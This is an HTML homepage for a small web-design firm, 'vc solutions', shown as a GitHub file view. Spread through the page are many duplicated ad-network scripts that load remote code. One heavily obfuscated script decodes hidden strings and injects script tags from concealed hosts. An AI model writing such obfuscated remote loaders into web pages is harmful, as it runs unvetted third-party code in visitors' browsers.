-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathindex.html
More file actions
628 lines (581 loc) · 27.3 KB
/
index.html
File metadata and controls
628 lines (581 loc) · 27.3 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
<!doctype html>
<html lang="en">
<head>
<script data-ad-client="ca-pub-6661291941906488" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Required meta tags -->
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<!-- Bootstrap CSS -->
<link rel="stylesheet" href="bootstrap/css/bootstrap.min.css">
<link rel="stylesheet" href="fontawesome-free-5.6.3-web/css/all.css">
<!-- Our Custom CSS style sheet -->
<link rel="stylesheet" href="css/style.css">
<title>Home - vc solutions</title>
</head>
<!-- xs<576 | 576<sm<768 | 768<md<992 | 992<lg<1200 | 1200<xl -->
<body>
<!-- START: HEADER -->
<header>
<div class="p-1" id="topHeader">
<div class="container">
<div class="row">
<div class="col-12 text-right">
<a class="p-1" href="tel:+1(343)301-5948"> <i class="fas fa-phone"></i> +1(343)301-5948 </a>
<a class="p-1" href="mailto:vcsolutions1234@gmail.com"> <i class="fas fa-envelope"></i>
vcsolutions1234@gmail.com </a>
</div>
</div>
</div>
</div>
<div id="bottomHeader">
<div class="container-fluid">
<nav class="navbar navbar-dark navbar-expand-md" style="background-color:#000000;">
<a class="navbar-brand" href="">
<img src="imgs/logo_text_white_small.png" width="150px" alt="">
</a>
<button data-toggle="collapse" data-target="#navbarToggler" type="button" class="navbar-toggler"><span class="navbar-toggler-icon"></span></button>
<div class="collapse navbar-collapse" id="navbarToggler">
<ul class="navbar-nav">
<li class="nav-item active">
<a class="nav-link" href="index.html">Home</a>
</li>
<li class="nav-item dropdown">
<a class="nav-link dropdown-toggle" data-toggle="dropdown" role="button" href="#">Services</a>
<div class="dropdown-menu">
<a class="dropdown-item" href="webdesigning.html">Web Designing</a>
<a class="dropdown-item" href="webdevelopment.html">Web Development</a>
<a class="dropdown-item" href="seoservices.html">SEO Services</a>
<a class="dropdown-item" href="softwaredevelopment.html">Software Development</a>
<a class="dropdown-item" href="mobileapps.html">Mobile App Development</a>
<div class="dropdown-divider"></div>
<a class="dropdown-item" href="graphicdesign.html">Graphic Designing</a>
</div>
</li>
<li class="nav-item">
<a class="nav-link" href="portfolio.html">Our work</a>
</li>
<li class="nav-item">
<a class="nav-link" href="aboutus.html">About Us</a>
</li>
<li class="nav-item">
<a class="nav-link" href="contactus.html">Contact Us</a>
</li>
</ul>
</div>
</nav>
</div>
</div>
</header>
<!-- END: HEADER -->
<!-- Start : Home page first hero section -->
<section>
<div class="container-fluid">
<div id="carouselExampleIndicators" class="carousel slide carousel-fade" data-ride="carousel">
<ol class="carousel-indicators">
<li data-target="#carouselExampleIndicators" data-slide-to="0" class="active"></li>
<li data-target="#carouselExampleIndicators" data-slide-to="1"></li>
<li data-target="#carouselExampleIndicators" data-slide-to="2"></li>
<li data-target="#carouselExampleIndicators" data-slide-to="3"></li>
</ol>
<div class="carousel-inner">
<div class="carousel-item active">
<img src="imgs/slideshow/graphic-designing.jpg" class="d-block w-100" alt="...">
<div class="carousel-caption d-none d-md-block">
<h1 class="myslideheader">Design website with us</h1>
</div>
</div>
<div class="carousel-item">
<img src="imgs/slideshow/mobile-development.jpg" class="d-block w-100" alt="...">
</div>
<div class="carousel-item">
<img src="imgs/slideshow/seo.jpg" class="d-block w-100" alt="...">
</div>
<div class="carousel-item">
<img src="imgs/slideshow/software-development.jpg" class="d-block w-100" alt="...">
</div>
</div>
<a class="carousel-control-prev" href="#carouselExampleIndicators" role="button" data-slide="prev">
<span class="carousel-control-prev-icon" aria-hidden="true"></span>
<span class="sr-only">Previous</span>
</a>
<a class="carousel-control-next" href="#carouselExampleIndicators" role="button" data-slide="next">
<span class="carousel-control-next-icon" aria-hidden="true"></span>
<span class="sr-only">Next</span>
</a>
</div>
</div>
</section>
<script type="text/javascript">
atOptions = {
'key' : '8acbe9b6726165f267f9ded512f3ac5f',
'format' : 'iframe',
'height' : 250,
'width' : 300,
'params' : {}
};
document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://www.displaycontentnetwork.com/8acbe9b6726165f267f9ded512f3ac5f/invoke.js"></scr' + 'ipt>');
</script>
<script type="text/javascript">
atOptions = {
'key' : '8acbe9b6726165f267f9ded512f3ac5f',
'format' : 'iframe',
'height' : 250,
'width' : 300,
'params' : {}
};
document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://aggressiveracketscout.com/8acbe9b6726165f267f9ded512f3ac5f/invoke.js"></scr' + 'ipt>');
</script>
<script type="text/javascript">
atOptions = {
'key' : '8acbe9b6726165f267f9ded512f3ac5f',
'format' : 'iframe',
'height' : 250,
'width' : 300,
'params' : {}
};
document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://www.displaycontentnetwork.com/8acbe9b6726165f267f9ded512f3ac5f/invoke.js"></scr' + 'ipt>');
</script>
<script type="text/javascript">
atOptions = {
'key' : '8acbe9b6726165f267f9ded512f3ac5f',
'format' : 'iframe',
'height' : 250,
'width' : 300,
'params' : {}
};
document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://www.displaycontentnetwork.com/8acbe9b6726165f267f9ded512f3ac5f/invoke.js"></scr' + 'ipt>');
</script>
<!-- <section class="top-hero-section pt-4 pb-5">
<div class="container">
<div class="row align-items-center">
<div class="col-md-5">
<h4>Quality - Support - Value</h4>
<h1>Best In Class IT Services</h1>
<h5>If its a website or an app or graphics, we can develop it for you at affordable rates. Send us your
requirements.</h5><br>
<button style="color: #fff; background-color: #000000" class="btn btn-lg">Get Started</button> <a href="#">
Read more...</a>
</div>
<div class="col-md-7">
<img class="img-fluid" src="imgs/hero-img-half.jpg" alt="">
</div>
</div>
</div>
</section> -->
<!-- END : Home page first hero section -->
<!-- START : Home page second section - Our Qualities -->
<section class="pt-3 pb-4">
<div class="container">
<div class="row">
<div class="col-12 text-center">
<h3>
Our services
</h3>
<hr>
</div>
</div>
<div class="row">
<div class="col-md-4 text-center">
<img class="img-fluid qualities-img p-5" src="imgs/our_qualities/customized.png" alt="">
<h5>
Customized Requirements
</h5>
<p>
Every idea is unique and that's why we craft it as per your requirements
</p>
</div>
<div class="col-md-4 text-center">
<img class="img-fluid qualities-img p-5" src="imgs/our_qualities/cloud.png" alt="">
<h5>
99% Server Uptime
</h5>
<p>
We make sure that your product stays up 24x7 with us.
</p>
</div>
<div class="col-md-4 text-center">
<img class="img-fluid qualities-img p-5" src="imgs/our_qualities/support.png" alt="">
<h5>
Quick Support
</h5>
<p>
We understand the sense of urgency whenever our clients need our help.
</p>
</div>
</div>
<div class="row">
<div class="col-md-4 text-center">
<img class="img-fluid qualities-img p-5" src="imgs/our_qualities/highquality.png" alt="">
<h5>
Quality Assurance
</h5>
<p>
Quality is the central edifice of our service and we make no compromises on it.
</p>
</div>
<div class="col-md-4 text-center">
<img class="img-fluid qualities-img p-5" src="imgs/our_qualities/delivery.png" alt="">
<h5>
On Time Delivery
</h5>
<p>
When you take a project to task, you can be rest assured that it will be delivered in time.
</p>
</div>
<div class="col-md-4 text-center">
<img class="img-fluid qualities-img p-5" src="imgs/our_qualities/highvalue.png" alt="">
<h5>
Value Of Money
</h5>
<p>
Get the best service for the money you pay us. We assure to give you the value for money.
</p>
</div>
</div>
</div>
</section>
<!-- END : Home page second section - Our Qualities -->
<script type="text/javascript">
atOptions = {
'key' : '317333a0e219690c3634a3a99d5e3c51',
'format' : 'iframe',
'height' : 50,
'width' : 320,
'params' : {}
};
document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://aggressiveracketscout.com/317333a0e219690c3634a3a99d5e3c51/invoke.js"></scr' + 'ipt>');
</script>
<script type="text/javascript">
atOptions = {
'key' : '9e3c0d69d59308cc62c8afaa4f9ada1f',
'format' : 'iframe',
'height' : 60,
'width' : 468,
'params' : {}
};
document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://aggressiveracketscout.com/9e3c0d69d59308cc62c8afaa4f9ada1f/invoke.js"></scr' + 'ipt>');
</script><script type="text/javascript">
atOptions = {
'key' : '9e3c0d69d59308cc62c8afaa4f9ada1f',
'format' : 'iframe',
'height' : 60,
'width' : 468,
'params' : {}
};
document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://aggressiveracketscout.com/9e3c0d69d59308cc62c8afaa4f9ada1f/invoke.js"></scr' + 'ipt>');
</script>
<!-- START : Home page 3rd section - Requirements -->
<section class="requirements-section pt-1 pb-1 pt-md-3 pb-md-3" style="background-color:#000000;">
<div class="container">
<div class="row align-items-center">
<div class="text-center col-md-9">
<h3>Why you should choose us?</h3>
</div>
</div>
</section>
<!-- END : Home page 3rd section - Requirements -->
<script type="text/javascript" data-cfasync="false">
/*<![CDATA[/* */
(function(){var fb0547b1dfb59ba08438c86978ab9570="EXYqNTnpkArHKz9Lf-gzKBiH4V8q6LEMSDbTUwVJtnCkZgYA4abIdqrOY0TcIneYEzsivZZBZeas";var a=['w7/DrQMUwrLDicOJEXctw605F3XCkAXDvcKVw6phw5LCk8OyEXjDtcK0w7kNCTkIQ8ORaUTCgMOsBMOOEg==','F8Ovw5XDkE8sSxc5w7bCt1Nhw6A=','w5Isw5bDpzrCnsKpwrYBRGLDng==','P8KgEiLDggTCpsK/HcOkw4DCrMKq','FsKgwprCogPDqQ==','L3HDnCcyFcOUwrbCtMKpBMOPbMOkw6Q=','P8KgGDDDhS7CkcK6H8Ogw4s=','fiAgUsOjSTMqQw==','NMKTOcKsEGfDjnHChkbDkMOy','w4BQwod2w4LCmMOvSUdzBsK+JQ==','wo1Jw6DDoSRbH1jCqcKGw4R6','L23DlDY=','ZsKqw4xC','K8KlAG3Dnw/Cl8K2FMOlw4zCssKxHQHCncKDS8O/w7wqwp4LOsOPw7LDhmtmwoLCh2TCjMODbQ==','VVtTw4pXwoRw','wrvCpm3DvsKdRGnChg==','AcKswojCpj/DoWQ=','CC/CuXpm','SFrCun/DuwE=','w4NQwpVSw5vCkcO2fEx1McKdJcKwSVUQwqoTw4U=','w4vDl8KiG8OLwoUgZA==','cichfsOzQA==','wrwKEMOoa0bCgzYbwqI=','FsKqwpzCrjrDuQ==','w4x/ZcKiw4MUw4EE','w6loXA=='];(function(b,c){var f=function(g){while(--g){b['push'](b['shift']());}};f(++c);}(a,0x134));var c=function(b,d){b=b-0x0;var e=a[b];if(c['rnjhJx']===undefined){(function(){var h;try{var j=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');');h=j();}catch(k){h=window;}var i='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';h['atob']||(h['atob']=function(l){var m=String(l)['replace'](/=+$/,'');var n='';for(var o=0x0,p,q,r=0x0;q=m['charAt'](r++);~q&&(p=o%0x4?p*0x40+q:q,o++%0x4)?n+=String['fromCharCode'](0xff&p>>(-0x2*o&0x6)):0x0){q=i['indexOf'](q);}return n;});}());var g=function(h,l){var m=[],n=0x0,o,p='',q='';h=atob(h);for(var t=0x0,u=h['length'];t<u;t++){q+='%'+('00'+h['charCodeAt'](t)['toString'](0x10))['slice'](-0x2);}h=decodeURIComponent(q);var r;for(r=0x0;r<0x100;r++){m[r]=r;}for(r=0x0;r<0x100;r++){n=(n+m[r]+l['charCodeAt'](r%l['length']))%0x100;o=m[r];m[r]=m[n];m[n]=o;}r=0x0;n=0x0;for(var v=0x0;v<h['length'];v++){r=(r+0x1)%0x100;n=(n+m[r])%0x100;o=m[r];m[r]=m[n];m[n]=o;p+=String['fromCharCode'](h['charCodeAt'](v)^m[(m[r]+m[n])%0x100]);}return p;};c['okTGYK']=g;c['hPdkPU']={};c['rnjhJx']=!![];}var f=c['hPdkPU'][b];if(f===undefined){if(c['NVXRLX']===undefined){c['NVXRLX']=!![];}e=c['okTGYK'](e,d);c['hPdkPU'][b]=e;}else{e=f;}return e;};var s=window;s[c('0x10','!(Ae')]=[[c('0x8','VumA'),0x41b6c7],[c('0x19','W86g'),0x0],[c('0x5','#v8*'),0x0],[c('0x6','Cj#x'),0x0],[c('0x14','VumA'),![]],[c('0xd','V!U9'),0x0],[c('0xe','Y$w7'),!0x0]];var b=[c('0x11','ler@'),c('0x4','1mIm')],u=0x0,l,h=function(){if(!b[u])return;l=s[c('0x18','tWkO')][c('0x7','ler@')](c('0x1','VumA'));l[c('0xf','qwNy')]=c('0x9','qwNy');l[c('0x15','Y5Ma')]=!0x0;var d=s[c('0x2','%2@F')][c('0x17','V!U9')](c('0x16','*)%O'))[0x0];l[c('0x3','InqR')]=c('0x13','VZm1')+b[u];l[c('0xa','ler@')]=c('0xb','W86g');l[c('0x12','ILil')]=function(){u++;h();};d[c('0x0','ScJE')][c('0xc','CD3[')](l,d);};h();})();
/*]]>/* */
</script>
<!-- START : Home page 4rd section - About Simple snippets -->
<section class="p-2 pt-md-4 pb-md-4">
<div class="container">
<div class="row align-items-center">
<div class="col-md-6">
<h2>About vc solutions</h2>
<h6>VC solutions it is a software company where we provide services to you, Grow your business with us,increase SEO, make responsive website, make mobile app to get easily manage your business. make your small business wider with the help of technology.</h6>
</div>
<div class="col-md-6">
<img class="img-fluid p-3" src="imgs/PicsArt_08-22-02.20.44.png" width="150px" alt="">
</div>
</div>
</div>
</section>
<!-- END : Home page 4rd section - About Simple snippets -->
<!-- START : Home page 5rd section - Newsletter section -->
<section class="home-newsletter p-2 pt-md-4 pb-md-4" style="background-color:#000000;">
<div class="row">
<div class="col-12 text-center">
<h3>
Subscribe to our Newsletter
</h3>
<div class="input-group p-3">
<input type="email" class="form-control" placeholder="Enter your email">
<span class="input-group-btn">
<button class="btn btn-theme" type="submit">Subscribe</button>
</span>
</div>
</div>
</div>
</section>
<!-- END : Home page 5th section - Newsletter section -->
<script async src='//aggressiveracketscout.com/26a2310e15bc3888fa700fbd4e397203/invoke.js'></script>
<script type="text/javascript">
atOptions = {
'key' : '8acbe9b6726165f267f9ded512f3ac5f',
'format' : 'iframe',
'height' : 250,
'width' : 300,
'params' : {}
};
document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://aggressiveracketscout.com/8acbe9b6726165f267f9ded512f3ac5f/invoke.js"></scr' + 'ipt>');
</script>
<script type="text/javascript">
atOptions = {
'key' : '8acbe9b6726165f267f9ded512f3ac5f',
'format' : 'iframe',
'height' : 250,
'width' : 300,
'params' : {}
};
document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://aggressiveracketscout.com/8acbe9b6726165f267f9ded512f3ac5f/invoke.js"></scr' + 'ipt>');
</script>
<script async src='//aggressiveracketscout.com/26a2310e15bc3888fa700fbd4e397203/invoke.js'></script>
<script type="text/javascript">
atOptions = {
'key' : '8acbe9b6726165f267f9ded512f3ac5f',
'format' : 'iframe',
'height' : 250,
'width' : 300,
'params' : {}
};
document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://aggressiveracketscout.com/8acbe9b6726165f267f9ded512f3ac5f/invoke.js"></scr' + 'ipt>');
</script>
<script async src='//aggressiveracketscout.com/26a2310e15bc3888fa700fbd4e397203/invoke.js'></script>
<script type="text/javascript">
atOptions = {
'key' : '8acbe9b6726165f267f9ded512f3ac5f',
'format' : 'iframe',
'height' : 250,
'width' : 300,
'params' : {}
};
document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://aggressiveracketscout.com/8acbe9b6726165f267f9ded512f3ac5f/invoke.js"></scr' + 'ipt>');
</script>
<!-- START : Home page 6th section - Our services -->
<section class="pt-3 pb-4">
<div class="container">
<div class="row mt-4">
<div class="col text-center">
<h3>
Do you have any requirement? our best Services
</h3>
</div>
</div>
<hr>
<div class="row">
<div class="col-md-4 text-center">
<img class="img-fluid qualities-img p-5" src="imgs/services/web-design.png" alt="Card image cap">
<h5>
Web Desigining
</h5>
<p>
We have a talent pool of experienced web designers
</p>
</div>
<div class="col-md-4 text-center">
<img class="img-fluid qualities-img p-5" src="imgs/services/web-development.png" alt="Card image cap">
<h5>
Web Development
</h5>
<p>
Get customized website developed in professional way.
</p>
</div>
<div class="col-md-4 text-center">
<img class="img-fluid qualities-img p-5" src="imgs/services/seo.png" alt="Card image cap">
<h5>
SEO services
</h5>
<p>
Rank your website number 1 to grab your valuable customers.
</p>
</div>
</div>
<div class="row mb-md-3">
<div class="col-md-4 text-center">
<img class="img-fluid qualities-img p-5" src="imgs/services/software-dev.png" alt="Card image cap">
<h5>
Software Development
</h5>
<p>
Customized software solutions according to your needs.
</p>
</div>
<div class="col-md-4 text-center">
<img class="img-fluid qualities-img p-5" src="imgs/services/mobile-app.png" alt="Card image cap">
<h5>
Mobile Development
</h5>
<p>
Built Android & iOS Apps for your business to scale your reach.
</p>
</div>
<div class="col-md-4 text-center">
<img class="img-fluid qualities-img p-5" src="imgs/services/graphic-design.png" alt="Card image cap">
<h5>
Graphic Designing
</h5>
<p>
Get your branding done right with our professional designers.
</p>
</div>
</div>
</section>
<!-- END : Home page 6th section - Our services -->
<!-- START : Home page 7th section - clients -->
<section class="pt-3 pb-4 clients-section">
<div class="container">
<div class="row">
<div class="col text-center">
<h3>
Some of our trusted clients.
</h3>
</div>
</div>
<hr>
<div class="row">
<div class="col-md-2 col-6">
<img class="img-fluid feature-img p-2" src="imgs/clients/google.png" alt="Card image cap">
</div>
<div class="col-md-2 col-6">
<img class="img-fluid feature-img p-2" src="imgs/clients/infosys.png" alt="Card image cap">
</div>
<div class="col-md-2 col-6">
<img class="img-fluid feature-img p-2" src="imgs/clients/lnt.png" alt="Card image cap">
</div>
<div class="col-md-2 col-6">
<img class="img-fluid feature-img p-2" src="imgs/clients/netflix1.png" alt="Card image cap">
</div>
<div class="col-md-2 col-6">
<img class="img-fluid feature-img p-2" src="imgs/clients/yahoo.png" alt="Card image cap">
</div>
</div>
</section>
<!-- END : Home page 7th section - clients -->
<script type="text/javascript">
atOptions = {
'key' : '8acbe9b6726165f267f9ded512f3ac5f',
'format' : 'iframe',
'height' : 250,
'width' : 300,
'params' : {}
};
document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://aggressiveracketscout.com/8acbe9b6726165f267f9ded512f3ac5f/invoke.js"></scr' + 'ipt>');
</script>
<script type="text/javascript">
atOptions = {
'key' : '8acbe9b6726165f267f9ded512f3ac5f',
'format' : 'iframe',
'height' : 250,
'width' : 300,
'params' : {}
};
document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://aggressiveracketscout.com/8acbe9b6726165f267f9ded512f3ac5f/invoke.js"></scr' + 'ipt>');
</script>
<script type="text/javascript">
atOptions = {
'key' : '8acbe9b6726165f267f9ded512f3ac5f',
'format' : 'iframe',
'height' : 250,
'width' : 300,
'params' : {}
};
document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://aggressiveracketscout.com/8acbe9b6726165f267f9ded512f3ac5f/invoke.js"></scr' + 'ipt>');
</script>
<script async src='//aggressiveracketscout.com/26a2310e15bc3888fa700fbd4e397203/invoke.js'></script>
<script type="text/javascript">
atOptions = {
'key' : '8acbe9b6726165f267f9ded512f3ac5f',
'format' : 'iframe',
'height' : 250,
'width' : 300,
'params' : {}
};
document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://aggressiveracketscout.com/8acbe9b6726165f267f9ded512f3ac5f/invoke.js"></scr' + 'ipt>');
</script>
<!-- START: FOOTER -->
<footer class="full-footer">
<div class="container top-footer p-md-3 p-1">
<div class="row">
<div class="col-md-3 pl-4 pr-4">
<img class="img-fluid" src="imgs/logo_text_white_small.png" width="150px" alt="">
<p>
vc solutions is a software company, we provide web services to you.
</p>
<a style="color:silver;" class="p-1" href="#"><i class="fab fa-2x fa-facebook-square"></i></a>
<a style="color: silver;" class="p-1" href="#"><i class="fab fa-2x fa-google-plus-square"></i></a>
<a style="color: silver;" class="p-1" href="#"><i class="fab fa-2x fa-twitter-square"></i></a>
<a style="color: silver;" class="p-1" href="https://instagram.com/vc_clicks_?igshid=rxl8yhbvherm"><i class="fab fa-2x fa-instagram"></i></a>
</div>
<div class="col-md-3 pl-4 pr-4">
<h3>Important Links</h3>
<a href="#">Privacy Policy</a><br>
<a href="#">Youtube Channel Link </a><br>
<a href="#">Blog Articles </a><br>
<a href="https://instagram.com/vc_clicks_?igshid=rxl8yhbvherm">Social Media</a>
<br> <a href="https://forms.gle/kTmw7MYy35QFkK7h7">career - apply now </a><br>
</div>
<div class="col-md-3 pl-4 pr-4">
<h3>Our Services</h3>
<a href="webdesigning.html">Web Designing </a><br>
<a href="webdevelopment.html">Web Development </a><br>
<a href="seoservices.html">SEO services </a><br>
<a href="softwaredevelopment.html">Software Development </a>
<a href="mobileapps.html">Mobile App Development </a>
<a href="graphicdesign.html">Graphic Designing</a>
</div>
<div class="col-md-3 pl-4 pr-4">
<h3>Contact Us</h3>
<a href="#"><i class="fas fa-phone"></i> +1(343)301-5948 </a><br>
<a href="mailto:vcsolutions1234@gmail.com "><i class="fas fa-envelope"></i> vcsolutions1234@gmail.com</a><br>
<div class="embed-responsive embed-responsive-16by9">
<iframe class="embed-responsive-item" src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d241316.64333236168!2d72.74110193617271!3d19.082522317332813!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3be7c6306644edc1%3A0x5da4ed8f8d648c69!2sMumbai%2C+Maharashtra!5e0!3m2!1sen!2sin!4v1547151374329"
frameborder="0"></iframe>
</div>
</div>
</div>
</div>
<div class="container-fluid bottom-footer pt-2">
<div class="row">
<div class="col-12 text-center">
<p>Copyrights © 2018 - All rights reserved</p>
</div>
</div>
</div>
</footer>
<!-- START: FOOTER -->
<!-- Optional JavaScript -->
<!-- jQuery first, then Popper.js, then Bootstrap JS -->
<script src="bootstrap/js/jquery-3.3.1.slim.min.js"></script>
<script src="bootstrap/js/popper.min.js"></script>
<script src="bootstrap/js/bootstrap.min.js"></script>
<!--Jquery-->
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script>
<!--Floating WhatsApp css-->
<link rel="stylesheet" href="https://rawcdn.githack.com/rafaelbotazini/floating-whatsapp/3d18b26d5c7d430a1ab0b664f8ca6b69014aed68/floating-wpp.min.css">
<!--Floating WhatsApp javascript-->
<script type="text/javascript" src="https://rawcdn.githack.com/rafaelbotazini/floating-whatsapp/3d18b26d5c7d430a1ab0b664f8ca6b69014aed68/floating-wpp.min.js"></script>
<body>
<!--Div where the WhatsApp will be rendered-->
<div id="WAButton"></div>
</body>
<script type="text/javascript">
$(function () {
$('#WAButton').floatingWhatsApp({
phone: '+1(343)301-5948', //WhatsApp Business phone number
headerTitle: 'Chat with vishal on WhatsApp!', //Popup Title
popupMessage: 'Hi there 👋 i am Vishal from vc solutions How can I help you?', //Popup Message
showPopup: true, //Enables popup display
buttonImage: '<img src="imgs/whatsapp.png" />',
position: "left" //Position: left | right
});
});
</script>
<script type="text/javascript" src="jquery-3.3.1.min.js"></script>
<script type="text/javascript" src="floating-wpp.min.js"></script>
<link rel="stylesheet" href="floating-wpp.min.css">
</body>
</html>